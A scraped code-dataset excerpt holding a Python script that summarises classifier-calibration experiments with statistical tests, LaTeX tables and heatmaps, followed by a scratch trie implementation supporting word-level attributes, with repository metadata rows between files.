if j == 0:
ax.set_ylabel(dat[:10])
if i == 0:
ax.set_title(cla)
if i == len(df_aux.index)-1:
ax.set_xticklabels(xticklabels, rotation=45, ha='right')
else:
ax.set_xticklabels([])
fig.subplots_adjust(hspace = 0.0)
fig.tight_layout()
fig.savefig(os.path.join(summary_path, 'bars_hyperparameters_{}.pdf'.format(key)))
# heatmaps of parameters
# FIXME change MAP method as it is not being used
def weight_matrix(string, restore_last_class=False):
solution = re.findall("'weights_': array(.*?)]]\)", string, flags=re.DOTALL)
matrices = []
for s in solution:
x = np.fromstring(''.join(c for c in s if c in
'0123456789.-e+,'), sep=',')
x = x.reshape(int(np.floor(np.sqrt(len(x)))), -1)
if restore_last_class:
col_sums = np.sum(x,axis=0)
amount_to_shift = ( col_sums[:-1] - np.diag(x) ) / (x.shape[0]-1)
x = x - np.concatenate((amount_to_shift,[0]))
x[:,-1] = x[:,-1] - col_sums[-1] / x.shape[0]
matrices.append(x)
return matrices
weight_matrix_rlc = partial(weight_matrix, restore_last_class=True)
def weight_matrix_theorem5(string):
solution = re.findall("'weights_': array(.*?)]]\)", string, flags=re.DOTALL)
matrices = []
for s in solution:
W = np.fromstring(''.join(c for c in s if c in
'0123456789.-e+,'), sep=',')
W = W.reshape(int(np.floor(np.sqrt(len(W)))), -1)
b = W[:, -1]
W = W[:,:-1]
col_min = np.min(W,axis=0)
A = W - col_min
softmax = lambda z:np.divide(np.exp(z), np.sum(np.exp(z)))
c = softmax(np.matmul(W, np.log(np.ones(len(b))/len(b))) + b)
matrices.append(np.hstack((A, c.reshape(-1,1))))
return matrices
def weights_keras(string):
coeficients = re.findall("'weights': \[array(.*?)]]", string, flags=re.DOTALL)
intercepts = re.findall(", array\(\[(.*?)]", string, flags=re.DOTALL)
matrices = []
for coef, inter in zip(coeficients, intercepts):
coef = np.fromstring(''.join(c for c in coef if c in
'0123456789.-e+,'), sep=',')
coef = coef.reshape(int(np.floor(np.sqrt(len(coef)))), -1)
inter = np.fromstring(''.join(c for c in inter if c in
'0123456789.-e+,'), sep=',')
x = np.vstack((coef.T, inter)).T
matrices.append(x)
return matrices
def coef_intercept_matrix(string):
coeficients = re.findall("'coef_': array(.*?)]]\)", string, flags=re.DOTALL)
intercepts = re.findall("'intercept_': array(.*?)]\)", string, flags=re.DOTALL)
matrices = []
for coef, inter in zip(coeficients, intercepts):
coef = np.fromstring(''.join(c for c in coef if c in
'0123456789.-e+,'), sep=',')
coef = coef.reshape(int(np.floor(np.sqrt(len(coef)))), -1)
inter = np.fromstring(''.join(c for c in inter if c in
'0123456789.-e+,'), sep=',')
x = np.vstack((coef.T, inter)).T
matrices.append(x)
return matrices
MAP_METHOD = {'Dirichlet_L2': weight_matrix_theorem5,
'dir_keras': weights_keras,
'dir_full_gen': weight_matrix,
'dir_full_comp_l2': weight_matrix_theorem5,
'OvR_Beta': weight_matrix,
'dirichlet_full_prefixdiag_l2': weight_matrix_theorem5,
'mlr_log': coef_intercept_matrix,
'mlr_logit': coef_intercept_matrix,
'ovr_mlr_log': coef_intercept_matrix,
'ovr_mlr_logit': coef_intercept_matrix
}
for key, function in MAP_METHOD.items():
df_aux = df[df['method'] == key][['dataset', 'classifier', 'calibrators']]
if len(df_aux) == 0:
continue
df_aux['calibrators'] = df_aux['calibrators'].apply(function)
df_aux = df_aux.pivot_table(index=['dataset'], columns=['classifier'],
values=['calibrators'],
aggfunc=MakeList)
fig = pyplot.figure(figsize=(df_aux.shape[1]*3, df_aux.shape[0]*3))
fig.suptitle(key)
ij = 1
for i, dat in enumerate(df_aux.index):
for j, cla in enumerate(df_aux.columns.levels[1]):
values = df_aux.loc[dat, ('calibrators', cla)]
ax = fig.add_subplot(len(df_aux), len(df_aux.columns), ij)
if j == 0:
ax.set_ylabel(dat)
if i == 0:
ax.set_title(cla)
ij += 1
if isinstance(values, float) and math.isnan(values):
continue
# Stacking (#iter x #crossval x #crossval) on first dimension
parameters = np.concatenate(values).mean(axis=0)
# Dirichlet Theorem5
if key in ['Dirichlet_L2', 'dir_full_comp_l2',
'dirichlet_full_prefixdiag_l2']:
col_min = np.min(parameters,axis=0)[:-1]
parameters[:,:-1] = parameters[:,:-1] - col_min
# FIXME solve problem here, it seems that values is always
# empty?
                # np.float was removed in recent NumPy; it was an alias of float
                if isinstance(parameters, float):
                    continue
cax = ax.pcolor(parameters)
middle_value = (parameters.max() + parameters.min())/2.0
fontsize = min((20/(parameters.shape[0]-2), 9))
for y in range(parameters.shape[0]):
for x in range(parameters.shape[1]):
color = 'white' if middle_value > parameters[y, x] else 'black'
ax.text(x + 0.5, y + 0.5, '%.e' % parameters[y, x],
horizontalalignment='center',
verticalalignment='center',
color=color, fontsize=fontsize
)
ax.invert_yaxis()
fig.tight_layout(rect=[0, 0.03, 1, 0.95])
fig.savefig(os.path.join(summary_path, 'heatmap_weights_{}.svg'.format(key)))
def generate_summaries(df, summary_path, table_size='small',
hyperparameters=True, confusion_matrices=True,
reduced_names=True):
'''
df: pandas.DataFrame
The dataframe needs at least the following columns
- 'dataset': name of the dataset
- 'n_classes':
- 'n_features':
- 'n_samples':
- 'method': calibration method (or method to compare)
- 'mc': Monte Carlo iteration
- 'test_fold': Number of the test fold
- 'train_acc': Training Accuracy
- 'train_loss': Training log-loss
- 'train_brier': Training Brier score
- 'train_guo-ece': Training binary ECE score
- 'train_cla-ece': Training classwise ECE score
- 'train_full-ece': Training full ECE score
- 'train_mce': Training MCE score
- 'acc': Accuracy
- 'loss': log-loss
- 'brier': Brier score
- 'guo-ece': Binary ECE score
- 'cla-ece': Classwise ECE score
- 'full-ece': Full ECE score
- 'p-guo-ece': p-value Guo ECE score
- 'p-cla-ece': p-value Classwise ECE score
- 'p-full-ece': p-value Full ECE score
- 'mce': MCE score
- 'exec_time': Mean execution time
- 'classifier': Original classifier used to train
- 'calibrators': List of calibrators with their parameters
'''
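    # A minimal sketch of the expected input (column names as listed above,
    # values made up purely for illustration):
    #   df = pd.DataFrame([{'dataset': 'iris', 'n_classes': 3, 'n_features': 4,
    #                       'n_samples': 150, 'method': 'uncalibrated',
    #                       'classifier': 'nbayes', 'mc': 0, 'test_fold': 0,
    #                       'acc': 0.9, 'loss': 0.3, 'brier': 0.1}])
    #   generate_summaries(df, summary_path='summary/')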
# Change name of metrics
df.rename({'guo-ece': 'conf-ece', 'p-guo-ece': 'p-conf-ece',
'train_guo-ece': 'train_conf-ece',
'cla-ece': 'cw-ece', 'p-cla-ece': 'p-cw-ece',
'train_cla-ece': 'train_cw-ece'},
axis='columns', inplace=True)
# Shorten some names
shorten = dict(dirichlet='dir', binning='bin', logistic='mlr',
uncalibrated='uncal')
for key, value in shorten.items():
df['method'] = df['method'].replace(to_replace=key, value=value,
regex=True)
# Names for final version
if reduced_names:
final_names = dict(
dir_fix_diag='TempS',
temperature_scaling='TempS',
vector_scaling='VecS',
uncal='Uncal',
ovr_dir_full='Beta',
bin_freq='FreqB',
bin_width='WidthB',
dir_full_l2='DirL2',
isotonic='Isot',
dir_full='Dir',
mlr_log='MultLogRegL2',
ovr_dir_full_l2='BetaL2',
ovr_mlr_log='LogRegL2',
dir_odir_l2='DirODIR',
temperature_scaling_noref='TempSNoref',
vector_scaling_noref='VecSNoref',
dir_odir_l2_noref='DirODIRNoref',
dir_full_noref='DirNoref',
dir_full_l2_noref='DirL2Noref',
)
new_order = ['Uncal', 'DirL2', 'DirL2Noref', 'DirODIR', 'DirODIRNoref',
'Beta', 'TempS', 'TempSNoref', 'VecS', 'VecSNoref',
'Isot', 'FreqB', 'WidthB']
else:
final_names = dict(
dir_fix_diag='Temp_Scaling',
temperature_scaling='Temp_Scaling',
vector_scaling='Vect_Scaling',
uncal='Uncalibrated',
ovr_dir_full='OvR_Beta',
bin_freq='OvR_Freq_Bin',
bin_width='OvR_Width_Bin',
dir_full_l2='Dirichlet_L2',
isotonic='OvR_Isotonic',
dir_full='Dirichlet',
mlr_log='Log_Reg_L2',
ovr_dir_full_l2='OvR_Beta_L2',
ovr_mlr_log='OvR_Log_Reg_L2',
            dir_odir_l2='Dirichlet_ODIR')
        # Also define a column order here; otherwise the reindex calls below
        # raise a NameError when reduced_names is False.
        new_order = list(final_names.values())
for key, value in final_names.items():
df['method'] = df['method'].replace(to_replace=key, value=value,
regex=False)
new_order = [method for method in new_order if method in
df['method'].unique()]
dataset_names = df['dataset'].unique()
classifiers = df['classifier'].unique()
measures_list = ['acc', 'loss', 'brier', 'conf-ece', 'cw-ece', 'full-ece',
'p-conf-ece', 'p-cw-ece', 'p-full-ece', 'mce']
measures_list = [measure for measure in measures_list if measure in df.columns]
# Assert that all experiments have finished
for column in ['method', 'classifier']:
for measure in measures_list:
df_count = df.pivot_table(index=['dataset'], columns=[column],
values=[measure], aggfunc='count')
file_basename = os.path.join(summary_path,
'results_count_{}_{}'.format(column,
measure))
df_to_heatmap(df_count, file_basename + '.svg',
title='Results count finite ' + measure, cmap='Greys_r')
# Export summary of datasets
(df[['dataset', 'n_samples', 'n_features', 'n_classes']]
.drop_duplicates()
.set_index('dataset')
.sort_index()
.to_latex(os.path.join(summary_path, 'datasets.tex')))
if hyperparameters:
print('Generating summary of hyperparameters')
summarise_hyperparameters(df, summary_path)
if confusion_matrices:
print('Generating summary of confusion matrices')
summarise_confusion_matrices(df, summary_path)
measures_list = (('acc', True), ('loss', False), ('brier', False),
('conf-ece', False), ('cw-ece', False),
('full-ece', False), ('p-conf-ece', True),
('p-cw-ece', True), ('p-full-ece', True),
('mce', False), ('exec_time', False),
#('train_acc', True), ('train_loss', False),
#('train_brier', False), ('train_conf-ece', False),
#('train_cw-ece', False), ('train_full-ece', False),
#('train_mce', False)
)
measures_list = [(key, value) for key, value in measures_list if key in
df.columns]
for measure, max_is_better in measures_list:
print('# Measure = {}'.format(measure))
if 'train_' not in measure:
filename = os.path.join(summary_path,
'n_samples_scatter')
export_dataset_analysis(df, measure, filename)
table = df.pivot_table(index=['classifier'], columns=['method'],
values=[measure], aggfunc=[np.mean, np.std])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
str_table = rankings_to_latex(classifiers, table, precision=2,
table_size=table_size, max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied on different classifiers ' +
'with the mean measure={}'
).format(measure),
label='table:mean:{}'.format(measure))
table = df.pivot_table(index=['mc', 'test_fold', 'dataset',
'classifier'], columns=['method'],
values=[measure], aggfunc=[len])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
try:
            assert np.all(table.values == 1)
except AssertionError as e:
print(e)
if 'train_' not in measure:
# Export the Mean performance of each method
table = df.pivot_table(index=['dataset', 'classifier', 'n_classes',
'n_samples'],
columns=['method'],
values=[measure])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
table.columns = table.columns.droplevel()
table.to_csv(os.path.join(summary_path, measure + '.csv'))
# Print correlation results
method = 'spearman' # for non-linear ranking correlations
#method = 'pearson' # for linear ranking correlations
print('\n{} correlation for the measure {}'.format(method, measure))
corr_test = table.reset_index(level=['n_classes', 'n_samples']).corr(method=method)
print(corr_test)
if ('train_' + measure) in [m[0] for m in measures_list]:
table = df.pivot_table(index=['dataset', 'classifier', 'n_classes',
'n_samples'],
columns=['method'],
values=['train_' + measure])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
table.columns = table.columns.droplevel()
table.to_csv(os.path.join(summary_path, 'train_' + measure + '.csv'))
print('\n{} correlation for the measure {}'.format(method, 'train_' + measure))
corr_train = table.reset_index(level=['n_classes', 'n_samples']).corr(method=method)
print(corr_train)
print('\n{} correlation difference of test - training for the measure {}'.format(method, measure))
print(corr_test - corr_train)
table = df.pivot_table(index=['mc', 'test_fold', 'dataset',
'classifier'], columns=['method'],
values=[measure])
cmap = pyplot.get_cmap('tab20')
if measure.startswith('p-'):
_p_table_nonan = table.dropna(axis=0)
_p_table = (_p_table_nonan > 0.05).mean(axis=0)
_p_table.sort_values(ascending=max_is_better, inplace=True)
_p_table.reset_index(level=0, drop=True, inplace=True)
filename = os.path.join(summary_path,
'p_table_calibrators_{}'.format(measure))
_p_table.to_latex(filename + '.tex')
fig = pyplot.figure(figsize=(4, 3))
ax = fig.add_subplot(111)
_p_table.plot(kind='barh', ax=ax, title=None, # '{} > 0.05'.format(measure),
zorder=2, color=cmap(_p_table.index.argsort().argsort()))
ax.grid(zorder=0)
ax.set_xlabel('Proportion (out of {})'.format(_p_table_nonan.shape[0]))
pyplot.tight_layout()
pyplot.savefig(filename + '.svg')
pyplot.close(fig)
print('Percentage of finite results per calibrator')
print(np.isfinite(table.values).mean(axis=0))
# Wilcoxon rank-sum test two-tailed
df_ranksums = compute_ranksums(table)
filename = os.path.join(summary_path,
'ranksum_pvalues_{}.tex'.format(measure))
threshold = 0.005
export_statistic_to_latex(df_ranksums, filename, threshold=threshold,
caption=('Wilcoxon rank-sum test statistic '
'for every paired method for the '
'measure of {}. Statistic is bold '
'when p-value is smaller than '
'{}').format(measure, threshold),
label='tab:ranksum:{}'.format(measure)
)
# Mann-Whitney rank test one-sided alternative is first is smaller than
df_mannwhitneyu = compute_mannwhitneyu(table)
filename = os.path.join(summary_path,
'mannwhitneyu_pvalues_{}.tex'.format(measure))
export_statistic_to_latex(df_mannwhitneyu, filename, threshold=threshold,
caption=('Mann-Whitney U test statistic '
'one sided with alternative '
'hypothesis the method in row i '
'is less than the method in column j '
'for every pair of methods for the '
'measure of {}. Statistic is bold '
'when the p-value is smaller than '
'{}').format(measure, threshold),
label='tab:mannwhitney:{}'.format(measure),
str_format='%1.1e'
)
ranking_table = np.zeros((len(classifiers),
df.method.unique().shape[0]))
measure_table = np.zeros((len(classifiers),
df.method.unique().shape[0]))
num_datasets = np.zeros(len(classifiers), dtype='int')
for i, classifier_name in enumerate(classifiers):
print('- Classifier name = {}'.format(classifier_name))
class_mask = df['classifier'] == classifier_name
table = df[class_mask].pivot_table(index=['dataset'],
columns=['method'],
values=[measure],
aggfunc=[np.mean, np.std])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
# Perform a Friedman statistic test
# Remove datasets in which one of the experiments failed
ftest = compute_friedmanchisquare(table['mean'])
print(ftest)
str_table = rankings_to_latex(dataset_names, table, precision=2,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied on the classifier ' +
'{} with the measure={}' +
'(Friedman statistic test ' +
'= {:.2E}, p-value = {:.2E})'
).format(classifier_name, measure,
ftest.statistic, ftest.pvalue),
label='table:{}:{}'.format(classifier_name,
measure),
add_std=False)
file_basename = os.path.join(summary_path, classifier_name +
'_dataset_vs_method_' + measure)
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
df_to_heatmap(table['mean'][measure], file_basename + '.svg',
title=measure)
df_to_heatmap(table['mean'][measure], file_basename + '_rows.svg',
title='Normalised rows for ' + measure,
normalise_rows=True)
#for i, classifier_name in enumerate(classifiers):
print('- Classifier name = {}'.format(classifier_name))
class_mask = df['classifier'] == classifier_name
table = df[class_mask].pivot_table(index=['dataset'],
columns=['method'],
values=[measure],
aggfunc=[np.mean, np.std])
# Remove datasets in which one of the experiments failed
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
table = table[~table.isna().any(axis=1)]
if max_is_better:
table *= -1
measure_table[i] = table['mean'].mean()
ranking_table[i] = table['mean'].apply(rankdata, axis=1).mean()
num_datasets[i] = len(table)
filename = os.path.join(summary_path, 'crit_diff_' +
classifier_name + '_' +
measure + '.pdf')
print(('Critical Difference computed with avranks of shape {} ' +
'for {} datasets').format(np.shape(ranking_table[i]),
table.shape[0]))
export_critical_difference(avranks=ranking_table[i],
num_datasets=table.shape[0],
names=table.columns.levels[2],
filename=filename,
title='(p-value = {:.2e}, #D = {})'.format(ftest.pvalue, table.shape[0]))
## 1.1. Export the summary of all rankings
df_mean_rankings = pd.DataFrame(ranking_table, index=classifiers,
columns=table.columns.levels[2])
df_mean_measures = pd.DataFrame(measure_table, index=classifiers,
columns=table.columns.levels[2])
if max_is_better:
df_mean_measures *= -1
## --------------------------------------------------------------##
## Version 2 for the aggregated rankings
# Perform rankings of dataset+classifier vs calibration method
table = df.pivot_table(index=['dataset', 'classifier'],
columns=['method'],
values=[measure], aggfunc=np.mean)
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
# Remove datasets and classifier combinations in which one of the experiments failed
table = table[~table.isna().any(axis=1)]
if max_is_better:
table *= -1
ranking_table_all = table.apply(rankdata, axis=1).mean()
ftest = compute_friedmanchisquare(table)
print('Friedman test on the full table of shape {}'.format(
np.shape(table)))
print(ftest)
print(('Critical Difference V.2 computed with avranks of shape {} for' +
'{} datasets').format(np.shape(ranking_table_all),
len(table)))
export_critical_difference(avranks=ranking_table_all,
num_datasets=len(table),
names=table.columns.levels[1],
filename=os.path.join(summary_path,
'crit_diff_' +
measure + '_v2.pdf'),
title='(p-value = {:.2e}, #D = {})'.format(ftest.pvalue, len(table)))
## End Version 2 for the aggregated rankings
## --------------------------------------------------------------##
## 1.2. Export the summary of all rankings
# TODO check that performing the ranking of the rankings is appropriate
print('Average rankings shape = {}'.format(ranking_table_all.shape))
print('Average rankings = {}'.format(ranking_table_all))
#df_mean_rankings.rename(reduced_names, axis='columns', inplace=True)
#df_mean_rankings = df_mean_rankings[new_order]
df_mean_rankings.sort_index(inplace=True)
str_table = rankings_to_latex(df_mean_rankings.index, df_mean_rankings,
precision=1, table_size=table_size,
max_is_better=False,
caption=('Ranking of calibration methods ' +
'for {} (Friedman\'s test significant ' +
'with p-value {:.2e}'
).format(measure, ftest.pvalue),
label='table:{}'.format(measure),
add_std=False,
column_names=df_mean_rankings.columns,
avg_ranks=ranking_table_all, add_rank=False)
file_basename = os.path.join(summary_path,
'{}_rankings'.format(measure))
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
# First version of table with the average measures
measure_table_all = df_mean_measures.mean(axis=0)
print('Average measures = {}'.format(df_mean_measures))
str_table = rankings_to_latex(classifiers, df_mean_measures,
precision=2,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied to each classifier ' +
'with the measure={}'
).format(measure),
label='table:{}'.format(measure),
add_std=False,
column_names=measure_table_all.index,
avg_ranks=measure_table_all, add_rank=True)
file_basename = os.path.join(summary_path,
'{}_average'.format(measure))
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
# Create effect size measures
ave_relative = np.zeros((len(classifiers),
df.method.unique().shape[0]))
for i, classifier_name in enumerate(classifiers):
print('- Classifier name = {}'.format(classifier_name))
class_mask = df['classifier'] == classifier_name
table = df[class_mask].pivot_table(index=['dataset'],
columns=['method'],
values=[measure])
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
uncal_measure = table[(measure, 'Uncal')]
table_values = (table.values -
uncal_measure.values.reshape(-1,1)
)/uncal_measure.values.reshape(-1,1)
table.iloc[:,:] = table_values
str_table = rankings_to_latex(table.index, table, precision=3,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied on the classifier ' +
'{} with the relative measure={}'
).format(classifier_name, measure),
label='table:rel:{}:{}'.format(classifier_name,
measure),
column_names=table.columns.levels[1],
add_std=False)
file_basename = os.path.join(summary_path, classifier_name +
'_dataset_vs_method_relative_' + measure)
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
ave_relative[i] = table.mean(axis=0)
df_ave_relative = pd.DataFrame(ave_relative, index=classifiers,
columns=table.columns.levels[1])
# First version of table with the average measures
ave_relative_all = df_ave_relative.mean(axis=0)
print('Average measures = {}'.format(ave_relative_all))
str_table = rankings_to_latex(classifiers, df_ave_relative,
precision=3,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of calibration methods ' +
'applied to each classifier ' +
'with the relative measure={}'
).format(measure),
label='table:rel:{}'.format(measure),
add_std=False,
column_names=df_ave_relative.columns,
avg_ranks=ave_relative_all, add_rank=True)
file_basename = os.path.join(summary_path,
'{}_rel_average'.format(measure))
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
# Answering rebuttal
base_name = 'Uncal'
for measure, max_is_better in measures_list:
table = df.pivot_table(index=['dataset', 'classifier', 'mc'],
columns=['method'], values=[measure],
)
table = table.reindex(new_order, axis=1, level='method')
table.sort_index(inplace=True)
if measure == 'acc':
table = 1 - table
base_measure = table[(measure, base_name)]
table_values = 100*(table.values -
base_measure.values.reshape(-1,1)
)/base_measure.values.reshape(-1,1)
table.iloc[:,:] = table_values
#relative_improvement = table[(measure, 'Dirichlet_L2')].agg(['min', 'max', 'mean', 'median'])
#print(measure)
relative_improvement = table.agg(['min', 'max', 'mean', 'median'])
print(relative_improvement)
relative_improvement.to_latex(os.path.join(summary_path,
'{}_relative_statistics.tex'.format(measure)))
for classifier_name in classifiers:
table = df.pivot_table(values=[key for key, value in measures_list],
index=['dataset', 'method'],
aggfunc=[np.mean, np.std])
table.sort_index(inplace=True)
table.to_csv(os.path.join(summary_path, classifier_name + '_main_results.csv'))
table.to_latex(os.path.join(summary_path, classifier_name + '_main_results.tex'))
def generate_classifier_summaries(df, summary_path, table_size='small'):
# Change name of metrics
df.rename({'guo-ece': 'conf-ece', 'p-guo-ece': 'p-conf-ece',
'train_guo-ece': 'train_conf-ece',
'cla-ece': 'cw-ece', 'p-cla-ece': 'p-cw-ece',
'train_cla-ece': 'train_cw-ece'},
axis='columns', inplace=True)
dataset_names = df['dataset'].unique()
classifiers = df['classifier'].unique()
df = df[df.method == 'uncalibrated']
measures_list = ['acc', 'loss', 'brier', 'conf-ece', 'cw-ece', 'full-ece',
'p-conf-ece', 'p-cw-ece', 'p-full-ece', 'mce']
measures_list = [measure for measure in measures_list if measure in df.columns]
measures_list = (('acc', True), ('loss', False), ('brier', False),
('conf-ece', False), ('cw-ece', False),
('full-ece', False), ('p-conf-ece', True),
('p-cw-ece', True), ('p-full-ece', True),
('mce', False), ('train_acc', True),
('train_loss', False), ('train_brier', False),
('exec_time', False), ('train_conf-ece', False),
('train_cw-ece', False), ('train_full-ece', False),
('train_mce', False), ('exec_time', False))
measures_list = [(key, value) for key, value in measures_list if key in
df.columns]
for measure, max_is_better in measures_list:
print('# Measure = {}'.format(measure))
table = df.pivot_table(index=['mc', 'test_fold', 'dataset',
], columns=['classifier'],
values=[measure])
cmap = pyplot.get_cmap('tab20')
if measure.startswith('p-'):
_p_table_nonan = table.dropna(axis=0)
_p_table = (_p_table_nonan > 0.05).mean(axis=0)
_p_table.sort_values(ascending=max_is_better, inplace=True)
_p_table.reset_index(level=0, drop=True, inplace=True)
filename = os.path.join(summary_path,
'p_table_classifiers_{}'.format(measure))
_p_table.to_latex(filename + '.tex')
fig = pyplot.figure(figsize=(4, 3))
ax = fig.add_subplot(111)
_p_table.plot(kind='barh', ax=ax, title=None, #'{} > 0.05'.format(measure),
zorder=2, color=cmap(_p_table.index.argsort().argsort()))
ax.grid(zorder=0)
ax.set_xlabel('Proportion (out of {})'.format(_p_table_nonan.shape[0]))
pyplot.tight_layout()
pyplot.savefig(filename + '.svg')
pyplot.close(fig)
print('Percentage of finite results per classifier')
print(np.isfinite(table.values).mean(axis=0))
# Wilcoxon rank-sum test two-tailed
df_ranksums = compute_ranksums(table)
filename = os.path.join(summary_path,
'classifiers_ranksum_pvalues_{}.tex'.format(measure))
threshold = 0.005
export_statistic_to_latex(df_ranksums, filename, threshold=threshold,
caption=('Wilcoxon rank-sum test statistic '
'for every paired uncalibrated '
'classifier for the '
'measure of {}. Statistic is bold '
'when p-value is smaller than '
'{}').format(measure, threshold),
label='tab:ranksum:{}'.format(measure)
)
# Mann-Whitney rank test one-sided alternative is first is smaller than
df_mannwhitneyu = compute_mannwhitneyu(table)
filename = os.path.join(summary_path,
'classifiers_mannwhitneyu_pvalues_{}.tex'.format(measure))
export_statistic_to_latex(df_mannwhitneyu, filename, threshold=threshold,
caption=('Mann-Whitney U test statistic '
'one sided with alternative '
'hypothesis the classifier in row i '
'is less than the classifier in column j '
'for every pair of uncalibrated '
'classifiers for the '
'measure of {}. Statistic is bold '
'when the p-value is smaller than '
'{}').format(measure, threshold),
label='tab:mannwhitney:{}'.format(measure),
str_format='%1.1e'
)
table = df.pivot_table(index=['dataset'], columns=['classifier'],
values=[measure], aggfunc=[np.mean, np.std])
table = table[~table.isna().any(axis=1)]
ftest = compute_friedmanchisquare(table['mean'])
print(ftest)
str_table = rankings_to_latex(dataset_names, table, precision=2,
table_size=table_size,
max_is_better=max_is_better,
caption=('Ranking of uncalibrated classifiers ' +
'with the measure={}' +
'(Friedman statistic test ' +
'= {:.2E}, p-value = {:.2E})'
).format(measure,
ftest.statistic, ftest.pvalue),
label='table:{}:{}'.format('uncal', measure),
add_std=False)
file_basename = os.path.join(summary_path,
'dataset_vs_classifier_' + measure)
with open(file_basename + '.tex', "w") as text_file:
text_file.write(str_table)
if max_is_better:
table *= -1
ranking_table = table['mean'].apply(rankdata, axis=1).mean()
filename = os.path.join(summary_path, 'crit_diff_' +
'uncal_classifiers' + '_' +
measure + '.pdf')
print(('Critical Difference computed with avranks of shape {} ' +
'for {} datasets').format(np.shape(ranking_table),
table.shape[0]))
try:
export_critical_difference(avranks=ranking_table,
num_datasets=table.shape[0],
names=table.columns.levels[2],
filename=filename,
title='(p-value = {:.2e}, #D = {})'.format(
ftest.pvalue, table.shape[0]))
except ZeroDivisionError as e:
print(e)
def generate_summary_hist(df, summary_path):
file_basename = os.path.join(summary_path, 'scores_histogram')
df = df.sort_index()
df_to_heatmap(df, file_basename + '.svg', title='Mean score histograms',
normalise_rows=True)
for classifier in df.index.levels[1]:
df_to_heatmap(df.loc[(slice(None), [classifier]),
:].reset_index(level='classifier', drop=True),
file_basename + '_' + classifier + '.svg',
title='Mean score histograms ' + classifier,
normalise_rows=True)
|
[
"perello.nieto@gmail.com"
] |
perello.nieto@gmail.com
|
8f6d16bbfe84dd5df87370eb683744f95b71f11f
|
e7ae54a18f187cb7539a0b2a134fe93e9afcbbe0
|
/notebooks/scratch_trie_with_attrs.py
|
e64c734c6432a181c406a9775a3d231168cb8116
|
[
"MIT"
] |
permissive
|
hdmamin/htools
|
b212f6dd3a910ad23de694e4202f9f513c8db52f
|
3905b46e9ed713dcd753108bee0eeb05b8a18aa4
|
refs/heads/master
| 2023-05-12T02:26:29.931781
| 2023-04-27T05:17:25
| 2023-04-27T05:17:25
| 177,682,148
| 1
| 1
|
MIT
| 2020-03-30T17:28:42
| 2019-03-25T23:49:36
|
Python
|
UTF-8
|
Python
| false
| false
| 3,442
|
py
|
"""
Want to eventually add support for trie with word-level and maybe char-level
attributes. Ex: word embeddings, word frequencies, char->char transition probs,
parts of speech, etc.). Also experimenting with a slightly different interface
than the existing trie in htools. Note that names are the same so if you import
htools * in a notebook, things may get confusing. Might want to rename these.
"""
from htools.core import listlike
class TrieNode:
def __init__(self, edges=None, is_terminal=False, is_root=False, **kwargs):
self.edges = edges or {}
self.is_terminal = is_terminal
self.is_root = is_root
self.kwarg_names = set(kwargs)
self.set_kwargs(**kwargs)
def set_kwargs(self, **kwargs):
self.kwarg_names.update(kwargs.keys())
self.__dict__.update(**kwargs)
def __contains__(self, char):
return char in self.edges
def __getitem__(self, char):
return self.edges[char]
def __setitem__(self, char, val):
self.edges[char] = val
def __repr__(self):
res = f'TrieNode(edges={list(self.edges)}, '\
f'is_terminal={self.is_terminal}, ' \
f'is_root={self.is_root}'
if self.kwarg_names:
kwarg_str = ', '.join(f'{kwarg}={getattr(self, kwarg)}'
for kwarg in self.kwarg_names)
res += ', ' + kwarg_str
return res + ')'
class Trie:
def __init__(self, vocab=None):
self.root = TrieNode(is_root=True)
self._initialize(vocab)
    def _initialize(self, vocab):
        # Nothing to build when no vocab is supplied.
        if not vocab:
            return
        # Case 1: vocab is list/tuple. Must assign empty kwargs.
        if listlike(vocab):
            vocab = {word: {} for word in vocab}
# Case 2: vocab is dict but values are not dicts. Must assign default name.
elif not isinstance(next(iter(vocab.values())), dict):
vocab = {word: {'val': val} for word, val in vocab.items()}
for word, kwargs in vocab.items():
self.add(word, **kwargs)
def add(self, word, **kwargs):
# These kwargs are associated with the whole word, e.g. if you want to
# pass in word counts or word embeddings. Still need to implement support
# for character-level attributes if I want that (e.g. if we want some kind of
# transition probability from 1 character to the next).
node = self.root
for char in word:
if char not in node:
node[char] = TrieNode()
node = node[char]
node.is_terminal = True
node.set_kwargs(**kwargs)
def update(self, words):
for word in words:
self.add(word)
# TODO - eventually want method that yields nodes as we add/search for a new
# word. Based on my coroutine/generator pattern. Still debugging.
def _find(self, word):
node = self.root
yield
for char in word:
cur = yield node
print('1', 'cur', cur, 'node', node)
if cur:
node = cur.get(char)
print('2', 'cur', cur, 'node', node)
if __name__ == '__main__':
word_dict = {
'app': 18,
'a': 6,
'apple': 17,
'about': 4,
'able': 6,
'zoo': 13,
'zen': 11,
'zesty': 14,
'apply': 4,
'cow': 18,
'zigzag': 12
}
t = Trie(word_dict)
    # _find is a method on Trie (the generator interface is still being debugged)
    coro = t._find('app')
print(next(coro))
for x in coro:
coro.send(x)
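    # Word-level attributes (the point of the kwargs plumbing above) can be
    # attached at insertion time; a small sketch with made-up values:
    #   t.add('apple', count=17, embedding=[0.1, 0.2])
    #   t.root['a']['p']['p']['l']['e'].count  # -> 17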
|
[
"hmamin2@dons.usfca.edu"
] |
hmamin2@dons.usfca.edu
|
35431caf74211b4c9fb9a864dc2341bb7c26cefa
|
d3902ba47e145a814117f588f0aba26ba49cc0bb
|
/osrm/utils.py
|
bd0cdc70c79b9659e73b75d7705d797c5df11c74
|
[
"MIT"
] |
permissive
|
ecotner/osrm-api
|
